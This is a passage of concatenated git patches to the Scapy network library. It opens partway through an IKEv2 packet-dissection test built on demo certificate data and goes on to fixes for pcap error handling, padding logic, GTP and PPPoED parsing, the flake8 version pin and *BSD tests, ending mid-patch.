ConfigurationAttribute(type=28678, length=0, value=''), + ConfigurationAttribute(type=28679, length=0, value=''), + ConfigurationAttribute(type=28680, length=0, value=''), + ConfigurationAttribute(type=28681, length=0, value=''), + ConfigurationAttribute(type=20003, length=0, value=''), + ConfigurationAttribute(type=20004, length=0, value=''), + ConfigurationAttribute(type=28682, length=0, value=''), + ConfigurationAttribute(type=20005, length=6, value='debian'), + ConfigurationAttribute(type=28682, length=6, value='debian') + ] + ) / + IKEv2_payload_SA( + next_payload='TSi', + res=0, + length=36, + prop=IKEv2_payload_Proposal( + next_payload='last', + res=0, + length=32, + proposal=1, + proto='ESP', + SPIsize=4, + trans_nb=2, + SPI=b'\xc1\xa9ek', + trans=IKEv2_payload_Transform(res=0, length=12, transform_type='Encryption', res2=0, transform_id='AES-GCM-16ICV', key_length=128) / + IKEv2_payload_Transform(res=0, length=8, transform_type='Extended Sequence Number', res2=0, transform_id='No ESN') + ) + ) / + IKEv2_payload_TSi( + next_payload='TSr', + res=0, + length=24, + number_of_TSs=1, + res2=0x0, + traffic_selector=[ + IPv4TrafficSelector(TS_type='TS_IPV4_ADDR_RANGE', + IP_protocol_ID='All protocols', + length=16, + start_port=0, + end_port=65535, + starting_address_v4='0.0.0.0', + ending_address_v4='255.255.255.255') + ] + ) / + IKEv2_payload_TSr( + next_payload='VendorID', + res=0, + length=24, + number_of_TSs=1, + res2=0x0, + traffic_selector=[ + IPv4TrafficSelector( + TS_type='TS_IPV4_ADDR_RANGE', + IP_protocol_ID='All protocols', + length=16, + start_port=0, + end_port=65535, + starting_address_v4='192.168.225.0', + ending_address_v4='192.168.225.255') + ] + ) / + IKEv2_payload_VendorID( + next_payload='VendorID', + res=0, + length=20, + vendorID=b'\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00' + ) / + IKEv2_payload_VendorID( + next_payload='VendorID', + res=0, + length=20, + vendorID=b'\xc6\x1b\xac\xa1\xf1\xa6\x0c\xc2\x08\x00\x00\x00\x00\x00\x00\x00' + ) / + IKEv2_payload_VendorID( + next_payload='Notify', + res=0, + length=28, + vendorID=b'NcP\n\t\xb8\xe8<\x80\xb6\x936&\x8e\xc8\xf6\x00\x0c)0\x10\x9e\x00\x00' + ) / + IKEv2_payload_Notify( + next_payload='Notify', + res=0, + length=8, + proto='Reserved', + SPIsize=0, + type='MOBIKE_SUPPORTED', + SPI='', + load='' + ) / + IKEv2_payload_Notify( + next_payload=None, + res=0, + length=8, + proto='Reserved', + SPIsize=0, + type='MULTIPLE_AUTH_SUPPORTED' + ) + ), + # IKE_AUTH response, decrypted + ( + # i: frame number + -3, + # title: + "IKE_AUTH response, decrypted", + binascii.unhexlify(''.join(""" + 000c2930109e0050 56eddb3208004500 0518a5dd00008011 1e5fac100f5cc0a8 + f58311942aca0504 886e000000008992 2c915f35570e98d5 6d32e2a047422420 + 2320000000010000 04f82500007e0900 00003074310b3009 0603550406130244 + 45311a3018060355 040a0c1144656d6f 204f7267616e697a 6174696f6e311030 + 0e060355040b0c07 44656d6f204f5531 10300e0603550403 0c07536572766572 + 313125302306092a 864886f70d010901 1616736572766572 314064656d6f2e6e + 63702d652e636f6d 270002e604308202 dd30820283a00302 0102020401000016 + 300a06082a8648ce 3d040302304b310b 3009060355040613 024445310f300d06 + 0355040813064261 7965726e310c300a 060355040a13034e 4350311d301b0603 + 55040313144e4350 2044656d6f204341 2045434320323035 303022180f323031 + 3630383034303830 3031355a180f3230 3530303830353038 303031355a307431 + 0b30090603550406 13024445311a3018 060355040a0c1144 656d6f204f726761 + 6e697a6174696f6e 3110300e06035504 0b0c0744656d6f20 4f553110300e0603 + 5504030c07536572 7665723131253023 06092a864886f70d 0109011616736572 + 766572314064656d 6f2e6e63702d652e 636f6d3059301306 072a8648ce3d0201 + 06082a8648ce3d03 010703420004dec7 f4b2c8b2dc4d6345 ea1bc875c1076b55 + d9dbc87d069d189b 3fd6bdffec3ec40a fc74a88583cc541b 46ada5e4040ce77d + 6ab7745987296ec1 d236a878f394a382 0126308201223009 0603551d13040230 + 00300b0603551d0f 0404030205a03027 0603551d25042030 1e06082b06010505 + 07030106082b0601 050507030206082b 0601050507030630 1d0603551d0e0416 + 0414a54698574719 a02a49f01a2c9484 d482d94c27233075 0603551d23046e30 + 6c801425db6d44de c7a03eb5f8623ab1 8784546a0f0409a1 4fa44d304b310b30 + 0906035504061302 4445310f300d0603 5504081306426179 65726e310c300a06 + 0355040a13034e43 50311d301b060355 040313144e435020 44656d6f20434120 + 4543432032303530 8203020002304906 03551d1104423040 a026060a2b060104 + 018237140203a018 0c16536572766572 314064656d6f2e6e 63702d652e636f6d + 8116536572766572 314064656d6f2e6e 63702d652e636f6d 300a06082a8648ce + 3d04030203480030 4502205387d21afa 1bab56fc406f8176 8ae73fe18b93b4cf + f191fd01cda6fd92 020e95022100ee5f 6735a9f6d6b377e7 13cacdddd72fc7fb + a5d48258479ee1ed f2af2da848502f00 005c0e0000000c30 0a06082a8648ce3d + 0403023045022078 d6a7e8b366bde8f9 c12f269f2bf64116 9511ce621a90059a + ed0fea47538b0e02 21008cf30813d135 aafe8e4dc0fdf2fd 595a9867f1a6083d + 1e01a149c905ecf9 bfe62100005c0200 000000010004c0a8 e10a00020004ffff + ff004e240004c0a8 e101000300040000 0000000300040000 00004e220004ac10 + 0f5c4e2200040000 0000000400040000 0000000400040000 00004e2300040000 + 0000700200002800 0024000000200103 0402ac0faf030300 000c01000014800e + 0080000000080500 00002c00002ccf0e 7950765db7f7371d bbdfa1720493c83c + 1ba4dc3617c3192a 57b9285d9a630ac7 164611fdf42c2d00 0018010000000700 + 00100000ffffc0a8 e10ac0a8e10a2b00 0018010000000700 00100000ffffc0a8 + e100c0a8e1ff2900 0014afcad71368a1 f1c96b8696fc7757 0100000000080000 + 400c + """.split())), + Ether(dst='00:0c:29:30:10:9e', src='00:50:56:ed:db:32', type='IPv4') / + IP(version=4, ihl=5, tos=0x0, len=1304, id=42461, flags='', frag=0, ttl=128, proto='udp', chksum=0x1e5f, src='172.16.15.92', dst='192.168.245.131') / + UDP(sport=4500, dport=10954, len=1284, chksum=0x886e) / + NON_ESP(non_esp=0x0) / + IKEv2( + init_SPI=b'\x89\x92\x2c\x91\x5f\x35\x57\x0e', + resp_SPI=b'\x98\xd5m2\xe2\xa0GB', + next_payload='IDr', + version=0x20, + exch_type='IKE_AUTH', + flags='Response', + id=1, + length=1272 + ) / + IKEv2_payload_IDr( + next_payload='CERT', + res=0, + length=126, + IDtype=9, + res2=0x0, + ID=b'0t1\x0b0\t\x06\x03U\x04\x06\x13\x02DE1\x1a0\x18\x06\x03U\x04\n\x0c\x11Demo Organization1\x100\x0e\x06\x03U\x04\x0b\x0c\x07Demo OU1\x100\x0e\x06\x03U\x04\x03\x0c\x07Server11%0#\x06\t*\x86H\x86\xf7\r\x01\t\x01\x16\x16server1@demo.ncp-e.com' + ) / + IKEv2_payload_CERT_CRT( + next_payload='AUTH', + res=0, + length=742, + cert_type='X.509 Certificate - Signature', + x509Cert=X509_Cert( + tbsCertificate=X509_TBSCertificate( + version=ASN1_INTEGER(2), + serialNumber=ASN1_INTEGER(0x1000016), + signature=X509_AlgorithmIdentifier( + algorithm=ASN1_OID('ecdsa-with-SHA256'), + parameters=None + ), + issuer=[ + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('countryName'), value=ASN1_PRINTABLE_STRING(b'DE'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('stateOrProvinceName'), value=ASN1_PRINTABLE_STRING(b'Bayern'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('organizationName'), value=ASN1_PRINTABLE_STRING(b'NCP'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('commonName'), value=ASN1_PRINTABLE_STRING(b'NCP Demo CA ECC 2050'))) + ], + validity=X509_Validity( + not_before=ASN1_GENERALIZED_TIME('20160804080015Z'), + not_after=ASN1_GENERALIZED_TIME('20500805080015Z') + ), + subject=[ + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('countryName'), value=ASN1_PRINTABLE_STRING(b'DE'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('organizationName'), value=ASN1_UTF8_STRING(b'Demo Organization'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('organizationUnitName'), value=ASN1_UTF8_STRING(b'Demo OU'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('commonName'), value=ASN1_UTF8_STRING(b'Server1'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('emailAddress'), value=ASN1_IA5_STRING(b'server1@demo.ncp-e.com'))) + ], + subjectPublicKeyInfo=X509_SubjectPublicKeyInfo( + signatureAlgorithm=X509_AlgorithmIdentifier( + algorithm=ASN1_OID('ecPublicKey'), + parameters=ASN1_OID('prime256v1') + ), + subjectPublicKey=ECDSAPublicKey( + ecPoint=ASN1_BIT_STRING( + '000001001101111011000111111101001011001011001000101100101101110' + '001001101011000110100010111101010000110111100100001110101110000' + '010000011101101011010101011101100111011011110010000111110100000' + '110100111010001100010011011001111111101011010111101111111111110' + '110000111110110001000000101011111100011101001010100010000101100' + '000111100110001010100000110110100011010101101101001011110010000' + '000100000011001110011101111101011010101011011101110100010110011' + '000011100101001011011101100000111010010001101101010100001111000' + '1111001110010100' + ) + ) + ), + issuerUniqueID=None, + subjectUniqueID=None, + extensions=[ + X509_Extension( + extnID=ASN1_OID('basicConstraints'), + critical=None, + extnValue=X509_ExtBasicConstraints(cA=None, pathLenConstraint=None) + ), + X509_Extension( + extnID=ASN1_OID('keyUsage'), + critical=None, + extnValue=X509_ExtKeyUsage(keyUsage=ASN1_BIT_STRING('101')) + ), + X509_Extension( + extnID=ASN1_OID('extKeyUsage'), + critical=None, + extnValue=X509_ExtExtendedKeyUsage( + extendedKeyUsage=[ + ASN1P_OID(oid=ASN1_OID('serverAuth')), + ASN1P_OID(oid=ASN1_OID('clientAuth')), + ASN1P_OID(oid=ASN1_OID('ipsecTunnel')) + ] + ) + ), + X509_Extension( + extnID=ASN1_OID('subjectKeyIdentifier'), + critical=None, + extnValue=X509_ExtSubjectKeyIdentifier( + keyIdentifier=ASN1_STRING(b"\xa5F\x98WG\x19\xa0*I\xf0\x1a,\x94\x84\xd4\x82\xd9L'#") + ) + ), + X509_Extension( + extnID=ASN1_OID('authorityKeyIdentifier'), + critical=None, + extnValue=X509_ExtAuthorityKeyIdentifier( + keyIdentifier=ASN1_STRING(b'%\xdbmD\xde\xc7\xa0>\xb5\xf8b:\xb1\x87\x84Tj\x0f\x04\t'), + authorityCertIssuer=X509_GeneralName( + generalName=X509_DirectoryName( + directoryName=[ + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('countryName'), value=ASN1_PRINTABLE_STRING(b'DE'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('stateOrProvinceName'), value=ASN1_PRINTABLE_STRING(b'Bayern'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('organizationName'), value=ASN1_PRINTABLE_STRING(b'NCP'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('commonName'), value=ASN1_PRINTABLE_STRING(b'NCP Demo CA ECC 2050'))) + ] + ) + ), + authorityCertSerialNumber=ASN1_INTEGER(0x20002) + ) + ), + X509_Extension( + extnID=ASN1_OID('subjectAltName'), + critical=None, + extnValue=X509_ExtSubjectAltName( + subjectAltName=[ + X509_GeneralName( + generalName=X509_OtherName( + type_id=ASN1_OID('.1.3.6.1.4.1.311.20.2.3'), + value=ASN1_UTF8_STRING(b'Server1@demo.ncp-e.com') + ) + ), + X509_GeneralName( + generalName=X509_RFC822Name( + rfc822Name=ASN1_IA5_STRING(b'Server1@demo.ncp-e.com') + ) + ) + ] + ) + ) + ] + ), + signatureAlgorithm=X509_AlgorithmIdentifier( + algorithm=ASN1_OID('ecdsa-with-SHA256'), + parameters=None + ), + signatureValue=ECDSASignature( + r=ASN1_INTEGER(0x5387d21afa1bab56fc406f81768ae73fe18b93b4cff191fd01cda6fd92020e95), + s=ASN1_INTEGER(0xee5f6735a9f6d6b377e713cacdddd72fc7fba5d48258479ee1edf2af2da84850) + ) + ) + ) / + IKEv2_payload_AUTH( + next_payload='CP', + res=0, + length=92, + auth_type='Digital Signature', + res2=0x0, + load=b'\x0c0\n\x06\x08*\x86H\xce=\x04\x03\x020E\x02 x\xd6\xa7\xe8\xb3f\xbd\xe8\xf9\xc1/&\x9f+\xf6A\x16\x95\x11\xceb\x1a\x90\x05\x9a\xed\x0f\xeaGS\x8b\x0e\x02!\x00\x8c\xf3\x08\x13\xd15\xaa\xfe\x8eM\xc0\xfd\xf2\xfdYZ\x98g\xf1\xa6\x08=\x1e\x01\xa1I\xc9\x05\xec\xf9\xbf\xe6' + ) / + IKEv2_payload_CP( + next_payload='SA', + res=0, + length=92, + CFGType='CFG_REPLY', + res2=0x0, + attributes=[ + ConfigurationAttribute(type='INTERNAL_IP4_ADDRESS', length=4, value='192.168.225.10'), + ConfigurationAttribute(type='INTERNAL_IP4_NETMASK', length=4, value='255.255.255.0'), + ConfigurationAttribute(type=20004, length=4, value=b'\xc0\xa8\xe1\x01'), + ConfigurationAttribute(type='INTERNAL_IP4_DNS', length=4, value='0.0.0.0'), + ConfigurationAttribute(type='INTERNAL_IP4_DNS', length=4, value='0.0.0.0'), + ConfigurationAttribute(type=20002, length=4, value=b'\xac\x10\x0f\x5c'), + ConfigurationAttribute(type=20002, length=4, value='\x00\x00\x00\x00'), + ConfigurationAttribute(type='INTERNAL_IP4_NBNS', length=4, value='0.0.0.0'), + ConfigurationAttribute(type='INTERNAL_IP4_NBNS', length=4, value='0.0.0.0'), + ConfigurationAttribute(type=20003, length=4, value=b'\x00\x00\x00\x00'), + ConfigurationAttribute(type=28674, length=0) + ] + ) / + IKEv2_payload_SA( + next_payload='Nonce', + res=0, + length=36, + prop=IKEv2_payload_Proposal( + res=0, + length=32, + proposal=1, + proto='ESP', + SPIsize=4, + trans_nb=2, + SPI=b'\xac\x0f\xaf\x03', + trans=IKEv2_payload_Transform(res=0, length=12, transform_type='Encryption', res2=0, transform_id='AES-GCM-16ICV', key_length=128) / + IKEv2_payload_Transform(res=0, length=8, transform_type='Extended Sequence Number', res2=0, transform_id='No ESN') + ) + ) / + IKEv2_payload_Nonce( + next_payload='TSi', + res=0, + length=44, + load=b'\xcf\x0eyPv]\xb7\xf77\x1d\xbb\xdf\xa1r\x04\x93\xc8<\x1b\xa4\xdc6\x17\xc3\x19*W\xb9(]\x9ac\n\xc7\x16F\x11\xfd\xf4,' + ) / + IKEv2_payload_TSi( + next_payload='TSr', + res=0, + length=24, + number_of_TSs=1, + res2=0x0, + traffic_selector=[ + IPv4TrafficSelector( + TS_type='TS_IPV4_ADDR_RANGE', + IP_protocol_ID='All protocols', + length=16, + start_port=0, + end_port=65535, + starting_address_v4='192.168.225.10', + ending_address_v4='192.168.225.10' + ) + ] + ) / + IKEv2_payload_TSr( + next_payload='VendorID', + res=0, + length=24, + number_of_TSs=1, + res2=0x0, + traffic_selector=[ + IPv4TrafficSelector( + TS_type='TS_IPV4_ADDR_RANGE', + IP_protocol_ID='All protocols', + length=16, + start_port=0, + end_port=65535, + starting_address_v4='192.168.225.0', + ending_address_v4='192.168.225.255' + ) + ] + ) / + IKEv2_payload_VendorID( + next_payload='Notify', + res=0, + length=20, + vendorID=b'\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00' + ) / + IKEv2_payload_Notify( + next_payload='None', + res=0, + length=8, + proto='Reserved', + SPIsize=0, + type='MOBIKE_SUPPORTED' + ) + ), ] +from __future__ import print_function -for i, data, packet in frames: - # the raw frame data coincides with the frame from the packet capture - assert data == raw(pcap[i]) +for i, title, data, packet in frames: + print(title) + if i >= 0: + # the raw frame data coincides with the frame from the packet capture + assert data == raw(pcap[i]) # the scapy packet correctly describes the frame assert raw(packet) == data # reassembling the dissected frame yields the original frame From 94ffc5ef953eee7c566234d18ec026cbf4ca69e7 Mon Sep 17 00:00:00 2001 From: Guy Harris Date: Mon, 21 Nov 2022 11:51:09 -0800 Subject: [PATCH 0924/1632] Fix error handling for pcap_create() and pcap_activate(). (#3796) * Fix error handling for pcap_create() and pcap_activate(). pcap_create() is not guaranteed to succeed; check whether it returns a null POINTER and, if so, report the error. pcap_activate() can return 1) 0, which means it succeeded with no warnings; 2) a netative number, which means it failed, and the number gives an indication of the type of failure 3) a positive number, which means it succeeded, but with a warning, and the number gives an indication of the type of warning. For now, we don't bother with warnings, so we check only for a negative return value. If we get a negative return value, then: if the return value is PCAP_ERROR, report an error with the result of pcap_geterr() as the error message; if the return value is PCAP_ERROR_NO_SUCH_DEVICE, report an error with the interface name, the result of pcap_statustostr() and the result of pcap_geterr() all in the error message if the return value is PCAP_ERROR_PERM_DENIED, and the result of pcap_geterr() isn't an empty string, report an error with the interface name, the result of pcap_statustostr() and the result of pcap_geterr() all in the error message; otherwise, report an error with the interface name and the result of pcap_statustostr() in the error message. (This is modeled after what tcpdump does.) * pep8 fixes. * pep8 fixes. * pcap_statustostr isn't exported on Winpcap Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/arch/libpcap.py | 40 +++++++++++++++++++++++-- scapy/libs/winpcapy.py | 67 ++++++++++++++++++++++++++++++++++++++++-- 2 files changed, 102 insertions(+), 5 deletions(-) diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 2a450710ed8..a879367f695 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -150,6 +150,9 @@ def close(self): try: from scapy.libs.winpcapy import ( PCAP_ERRBUF_SIZE, + PCAP_ERROR, + PCAP_ERROR_NO_SUCH_DEVICE, + PCAP_ERROR_PERM_DENIED, bpf_program, pcap_close, pcap_compile, @@ -286,15 +289,46 @@ def __init__(self, # Npcap-only functions from scapy.libs.winpcapy import pcap_create, \ pcap_set_snaplen, pcap_set_promisc, \ - pcap_set_timeout, pcap_set_rfmon, pcap_activate + pcap_set_timeout, pcap_set_rfmon, pcap_activate, \ + pcap_statustostr, pcap_geterr self.pcap = pcap_create(self.iface, self.errbuf) + if not self.pcap: + error = decode_locale_str(bytearray(self.errbuf).strip(b"\x00")) + if error: + raise OSError(error) pcap_set_snaplen(self.pcap, snaplen) pcap_set_promisc(self.pcap, promisc) pcap_set_timeout(self.pcap, to_ms) if pcap_set_rfmon(self.pcap, 1) != 0: log_runtime.error("Could not set monitor mode") - if pcap_activate(self.pcap) != 0: - raise OSError("Could not activate the pcap handler") + status = pcap_activate(self.pcap) + # status == 0 means success + # status < 0 means error + # status > 0 means success, but with a warning + if status < 0: + # self.iface, and strings we get back from + # pcap_geterr() and pcap_statustostr(), have the + # type "bytes". + # + # decode_locale_str() turns them into strings. + iface = decode_locale_str( + bytearray(self.iface).strip(b"\x00") + ) + errstr = decode_locale_str( + bytearray(pcap_geterr(self.pcap)).strip(b"\x00") + ) + statusstr = decode_locale_str( + bytearray(pcap_statustostr(status)).strip(b"\x00") + ) + if status == PCAP_ERROR: + errmsg = errstr + elif status == PCAP_ERROR_NO_SUCH_DEVICE: + errmsg = "%s: %s\n(%s)" % (iface, statusstr, errstr) + elif status == PCAP_ERROR_PERM_DENIED and errstr != "": + errmsg = "%s: %s\n(%s)" % (iface, statusstr, errstr) + else: + errmsg = "%s: %s" % (iface, statusstr) + raise OSError(errmsg) else: self.pcap = pcap_open_live(self.iface, snaplen, promisc, to_ms, diff --git a/scapy/libs/winpcapy.py b/scapy/libs/winpcapy.py index 74da47a5a3e..38ea0a83359 100644 --- a/scapy/libs/winpcapy.py +++ b/scapy/libs/winpcapy.py @@ -5,7 +5,9 @@ # Copyright (C) Gabriel Potter # Modified for scapy's usage - To support Npcap/Monitor mode - +# +# NOTE: the "winpcap" in the name nonwithstanding, this is for use +# with libpcap on non-Windows platforms, as well as for WinPcap and Npcap. from ctypes import * from ctypes.util import find_library @@ -223,6 +225,60 @@ class pcap_if(Structure): # Statistical mode, to be used when calling pcap_setmode(). MODE_STAT = 1 +# Error codes for the pcap API. +# These will all be negative, so you can check for the success or +# failure of a call that returns these codes by checking for a +# negative value. +# +# generic error code +# define PCAP_ERROR -1 +PCAP_ERROR = -1 +# loop terminated by pcap_breakloop +# define PCAP_ERROR_BREAK -2 +PCAP_ERROR_BREAK = -2 +# the capture needs to be activated +# define PCAP_ERROR_NOT_ACTIVATED -3 +PCAP_ERROR_NOT_ACTIVATED = -3 +# the operation can't be performed on already activated captures +# define PCAP_ERROR_ACTIVATED -4 +PCAP_ERROR_ACTIVATED = -4 +# no such device exists +# define PCAP_ERROR_NO_SUCH_DEVICE -5 +PCAP_ERROR_NO_SUCH_DEVICE = -5 +# this device doesn't support rfmon (monitor) mode */ +# define PCAP_ERROR_RFMON_NOTSUP -6 +PCAP_ERROR_RFMON_NOTSUP = -6 +# operation supported only in monitor mode +# define PCAP_ERROR_NOT_RFMON -7 +PCAP_ERROR_NOT_RFMON = -7 +# no permission to open the device +# define PCAP_ERROR_PERM_DENIED -8 +PCAP_ERROR_PERM_DENIED = -8 +# interface isn't up +# define PCAP_ERROR_IFACE_NOT_UP -9 +PCAP_ERROR_IFACE_NOT_UP = -9 +# define PCAP_ERROR_CANTSET_TSTAMP_TYPE -10 +# this device doesn't support setting the time stamp type +# you don't have permission to capture in promiscuous mode +# define PCAP_ERROR_PROMISC_PERM_DENIED -11 +PCAP_ERROR_PROMISC_PERM_DENIED = -11 +# the requested time stamp precision is not supported +# define PCAP_ERROR_TSTAMP_PRECISION_NOTSUP -12 +PCAP_ERROR_TSTAMP_PRECISION_NOTSUP = -12 + +# Warning codes for the pcap API. +# These will all be positive and non-zero, so they won't look like +# errors. +# generic warning code +# define PCAP_WARNING 1 +PCAP_WARNING = 1 +# this device doesn't support promiscuous mode +# define PCAP_WARNING_PROMISC_NOTSUP 2 +PCAP_WARNING_PROMISC_NOTSUP = 2 +# the requested time stamp type is not supported +# define PCAP_WARNING_TSTAMP_TYPE_NOTSUP 3 +PCAP_WARNING_TSTAMP_TYPE_NOTSUP = 3 + ## # END Defines ## @@ -292,7 +348,8 @@ class pcap_if(Structure): pcap_open_offline.argtypes = [STRING, STRING] try: - # NPCAP/LINUX ONLY function + # Functions not available on WINPCAP + # int pcap_set_rfmon (pcap_t *p) # sets whether monitor mode should be set on a capture handle when the # handle is activated. @@ -335,6 +392,12 @@ class pcap_if(Structure): pcap_inject = _lib.pcap_inject pcap_inject.restype = c_int pcap_inject.argtypes = [POINTER(pcap_t), c_void_p, c_int] + + # const char * pcap_statustostr (int error) + # print the text of the status (error or warning) corresponding to error. + pcap_statustostr = _lib.pcap_statustostr + pcap_statustostr.restype = STRING + pcap_statustostr.argtypes = [c_int] except AttributeError: pass From 6d0d230701ffd4e64e6f976e21bd7a44415a087e Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 21 Nov 2022 14:39:35 +0100 Subject: [PATCH 0925/1632] Python3 nzpadding fix --- scapy/plist.py | 2 +- test/regression.uts | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/scapy/plist.py b/scapy/plist.py index ad5995cb84a..8ca81711dd6 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -471,7 +471,7 @@ def nzpadding(self, lfilter=None): p = self._elt2pkt(res) if p.haslayer(conf.padding_layer): pad = p.getlayer(conf.padding_layer).load # type: ignore - if pad == pad[0] * len(pad): + if pad == pad[:1] * len(pad): continue if lfilter is None or lfilter(p): print("%s %s %s" % (conf.color_theme.id(i, fmt="%04i"), diff --git a/test/regression.uts b/test/regression.uts index 1ede355bf2f..e3c907e4896 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4639,11 +4639,11 @@ test_padding() def test_nzpadding(): with ContextManagerCaptureOutput() as cmco: - p = PacketList([IP()/conf.padding_layer("A%s" % i) for i in range(2)]) + p = PacketList([IP()/conf.padding_layer("AB"), IP()/conf.padding_layer("\x00\x00")]) p.nzpadding() result_pl_nzpadding = cmco.get_output() - assert len(result_pl_nzpadding.split('\n')) == 5 - assert "0000 41 30" in result_pl_nzpadding + assert len(result_pl_nzpadding.split('\n')) == 3 + assert "0000 41 42" in result_pl_nzpadding test_nzpadding() From 55cc4eebfa2a947c0f2485a52d51099c60a06d8f Mon Sep 17 00:00:00 2001 From: vladimir1marchenko Date: Sat, 26 Nov 2022 00:27:45 +0600 Subject: [PATCH 0926/1632] fix GTPDeletePDPContextResponse --- scapy/contrib/gtp.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index faaffba1a95..01782f11f63 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -1023,6 +1023,9 @@ class GTPDeletePDPContextResponse(Packet): name = "GTP Delete PDP Context Response" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] + def answers(self, other): + return isinstance(other, GTPDeletePDPContextRequest) + class GTPPDUNotificationRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) From 8cd375c69056583d38b7e3629d236253a31c1ebe Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:19:57 +0100 Subject: [PATCH 0927/1632] Fix PPPoED padding calculation As correctly pointed out by #3767, PPPoED padding is completely broken. This fixes it plus added a test. fixes #3767 --- scapy/layers/ppp.py | 5 +---- test/scapy/layers/ppp.uts | 17 ++++++++++++++++- 2 files changed, 17 insertions(+), 5 deletions(-) diff --git a/scapy/layers/ppp.py b/scapy/layers/ppp.py index e9a29a6892a..e38c1677d31 100644 --- a/scapy/layers/ppp.py +++ b/scapy/layers/ppp.py @@ -78,10 +78,7 @@ class PPPoED(PPPoE): ShortField("len", None)] def extract_padding(self, s): - if len(s) < 5: - return s, None - length = struct.unpack("!H", s[4:6])[0] - return s[:length], s[length:] + return s[:self.len], s[self.len:] def mysummary(self): return self.sprintf("%code%") diff --git a/test/scapy/layers/ppp.uts b/test/scapy/layers/ppp.uts index daa6a933a4d..42bd818a313 100644 --- a/test/scapy/layers/ppp.uts +++ b/test/scapy/layers/ppp.uts @@ -17,11 +17,26 @@ assert PPPoED_Tags in p q=p[PPPoED_Tags] assert q.tag_list is not None r=q.tag_list +assert len(r) == 2 assert r[0].tag_type==0x0101 assert r[1].tag_type==0x0103 assert r[1].tag_len==4 assert r[1].tag_value==b'\x01\x02\x03\x04' -assert r[2].tag_type==0x0000 + +assert Padding in p and len(p[Padding]) == 4 + += PPPoE with tags (appended) +~ ppp ppoe +eth = Ether(dst="ff:ff:ff:ff:ff:ff", src="12:12:12:12:12:12", type=0x8863) +pppoed = PPPoED(version=1, type=1, code=0x9, sessionid=0, len=8) +server_name = PPPoETag(tag_type=0x0101, tag_len=0) +end_of_list = PPPoETag(tag_type=0, tag_len=0) + +original = eth / pppoed / server_name / end_of_list +dissected = Ether(original.build()) +assert PPPoED_Tags in dissected +assert dissected[PPPoED_Tags].tag_list[0].tag_type == 0x0101 +assert dissected[PPPoED_Tags].tag_list[1].tag_type == 0 = PPPoE with padding ~ ppp pppoe From 4990c6844b03c822bdbf1de3951e965ae304d8a6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 2 Dec 2022 16:36:40 +0100 Subject: [PATCH 0928/1632] Fix flake8<6.0.0 Flake8 6.0.0 stopped working with Python 2 type hints. Stick to <6.0.0 for now --- tox.ini | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tox.ini b/tox.ini index 7bdc3a49786..40e3e662cf9 100644 --- a/tox.ini +++ b/tox.ini @@ -143,7 +143,7 @@ commands = python setup.py --quiet sdist [testenv:flake8] description = "Check Scapy code style & quality" skip_install = true -deps = flake8 +deps = flake8<6.0.0 commands = flake8 scapy/ From c1e10afb11c73951c587505546b8447b34ae4d48 Mon Sep 17 00:00:00 2001 From: Noam Zaks Date: Tue, 6 Dec 2022 12:45:51 +0200 Subject: [PATCH 0929/1632] Fix minor typo in sendrecv doc (#3804) --- scapy/sendrecv.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 78104fd96b5..262ebae7335 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -433,7 +433,7 @@ def send(x, # type: _PacketIterable :param inter: time (in s) between two packets (default 0) :param loop: send packet indefinitely (default 0) :param count: number of packets to send (default None=1) - :param verbose: verbose mode (default None=conf.verbose) + :param verbose: verbose mode (default None=conf.verb) :param realtime: check that a packet was sent before sending the next one :param return_packets: return the sent packets :param socket: the socket to use (default is conf.L3socket(kargs)) @@ -465,7 +465,7 @@ def sendp(x, # type: _PacketIterable :param inter: time (in s) between two packets (default 0) :param loop: send packet indefinitely (default 0) :param count: number of packets to send (default None=1) - :param verbose: verbose mode (default None=conf.verbose) + :param verbose: verbose mode (default None=conf.verb) :param realtime: check that a packet was sent before sending the next one :param return_packets: return the sent packets :param socket: the socket to use (default is conf.L3socket(kargs)) From 6a4f0db101599354ace4166520b1bbf347976345 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 6 Dec 2022 23:22:31 +0100 Subject: [PATCH 0930/1632] *BSD fixes (#3810) * FreeBSD - /dev/bpf cannot send packets to /dev/tun* and /dev/tap* * FreeBSD - unit test fixes * OpenBSD - unit test fixes * NetBSD - unit test fixes --- .config/ci/openssl.py | 7 +++++-- .config/ci/test.sh 